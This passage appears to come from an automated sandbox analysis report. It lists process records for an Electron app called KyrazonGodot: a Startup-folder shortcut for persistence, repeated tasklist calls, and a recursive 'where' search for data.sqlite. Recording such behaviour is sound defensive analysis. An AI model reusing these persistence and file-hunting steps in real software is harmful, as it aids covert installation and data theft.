                                                                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:17:54:24
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe"
                                                                                    Imagebase:0x7ff6615b0000
                                                                                    File size:172'671'488 bytes
                                                                                    MD5 hash:EEB12AAC1FF31A9D17BA437700CAF9D6
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:11
                                                                                    Start time:17:54:28
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1748 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
                                                                                    Imagebase:0x7ff6615b0000
                                                                                    File size:172'671'488 bytes
                                                                                    MD5 hash:EEB12AAC1FF31A9D17BA437700CAF9D6
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:12
                                                                                    Start time:17:54:27
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe /A:C "/F:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk" /T:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:57'344 bytes
                                                                                    MD5 hash:59375510BDE2FF0DBA7A8197AD9F12BB
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:13
                                                                                    Start time:17:54:27
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:14
                                                                                    Start time:17:54:28
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:15
                                                                                    Start time:17:54:28
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:16
                                                                                    Start time:17:54:28
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:18
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:19
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:20
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:21
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:22
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:23
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:24
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:25
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:26
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:27
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:28
                                                                                    Start time:17:54:30
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\where.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:where /r . data.sqlite
                                                                                    Imagebase:0x7ff7ec1b0000
                                                                                    File size:43'008 bytes
                                                                                    MD5 hash:3CF958B0F63FB1D74F7FCFE14B039A58
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:29
                                                                                    Start time:17:54:33
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2364 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
                                                                                    Imagebase:0x7ff6615b0000
                                                                                    File size:172'671'488 bytes
                                                                                    MD5 hash:EEB12AAC1FF31A9D17BA437700CAF9D6
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:30
                                                                                    Start time:17:54:33
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:31
                                                                                    Start time:17:54:33
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:32
                                                                                    Start time:17:54:33
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:33
                                                                                    Start time:17:54:34
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:34
                                                                                    Start time:17:54:34
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:35
                                                                                    Start time:17:54:34
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:36
                                                                                    Start time:17:54:35
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:37
                                                                                    Start time:17:54:35
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:38
                                                                                    Start time:17:54:35
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:39
                                                                                    Start time:17:54:36
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:40
                                                                                    Start time:17:54:36
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:41
                                                                                    Start time:17:54:36
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:42
                                                                                    Start time:17:54:38
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:43
                                                                                    Start time:17:54:38
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:44
                                                                                    Start time:17:54:38
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:45
                                                                                    Start time:17:54:38
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:46
                                                                                    Start time:17:54:39
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:47
                                                                                    Start time:17:54:39
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:48
                                                                                    Start time:17:54:40
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe"
                                                                                    Imagebase:0x7ff6615b0000
                                                                                    File size:172'671'488 bytes
                                                                                    MD5 hash:EEB12AAC1FF31A9D17BA437700CAF9D6
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:49
                                                                                    Start time:17:54:40
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:50
                                                                                    Start time:17:54:40
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:51
                                                                                    Start time:17:54:40
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:52
                                                                                    Start time:17:54:42
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1640 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
                                                                                    Imagebase:0x7ff6615b0000
                                                                                    File size:172'671'488 bytes
                                                                                    MD5 hash:EEB12AAC1FF31A9D17BA437700CAF9D6
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:53
                                                                                    Start time:17:54:41
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:54
                                                                                    Start time:17:54:41
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:55
                                                                                    Start time:17:54:42
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:56
                                                                                    Start time:17:54:42
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:57
                                                                                    Start time:17:54:42
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:58
                                                                                    Start time:17:54:44
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2304 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
                                                                                    Imagebase:0x7ff6615b0000
                                                                                    File size:172'671'488 bytes
                                                                                    MD5 hash:EEB12AAC1FF31A9D17BA437700CAF9D6
                                                                                    Has elevated privileges:false
